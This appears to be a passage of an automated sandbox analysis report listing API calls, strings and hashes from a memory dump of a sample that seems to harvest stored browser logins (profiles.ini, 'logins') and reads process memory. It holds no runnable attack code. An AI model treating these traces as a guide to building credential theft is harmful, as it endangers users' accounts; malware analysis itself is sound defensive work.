                                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                                            • API String ID: 2080319088-3046471546
                                                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                            APIs
                                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                            • memset.MSVCRT ref: 00413292
                                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                                            • memset.MSVCRT ref: 00413310
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                            Strings
                                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                            • API String ID: 4111938811-1819279800
                                                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 829165378-0
                                                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00404172
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                                            • memset.MSVCRT ref: 00404200
                                                                                                            • memset.MSVCRT ref: 00404215
                                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                                            • memset.MSVCRT ref: 004042E2
                                                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                            • API String ID: 2454223109-1580313836
                                                                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                            • API String ID: 4054529287-3175352466
                                                                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                            • API String ID: 3143752011-1996832678
                                                                                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                            • API String ID: 667068680-2887671607
                                                                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                            • API String ID: 1607361635-601624466
                                                                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                            • API String ID: 2000436516-3842416460
                                                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1043902810-0
                                                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                            APIs
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                            • API String ID: 2899246560-1542517562
                                                                                                            • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                            • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040DBCD
                                                                                                            • memset.MSVCRT ref: 0040DBE9
                                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                            • API String ID: 3330709923-517860148
                                                                                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                            • memset.MSVCRT ref: 0040806A
                                                                                                            • memset.MSVCRT ref: 0040807F
                                                                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                            • memset.MSVCRT ref: 004081E4
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                            • String ID: logins$null
                                                                                                            • API String ID: 2148543256-2163367763
                                                                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
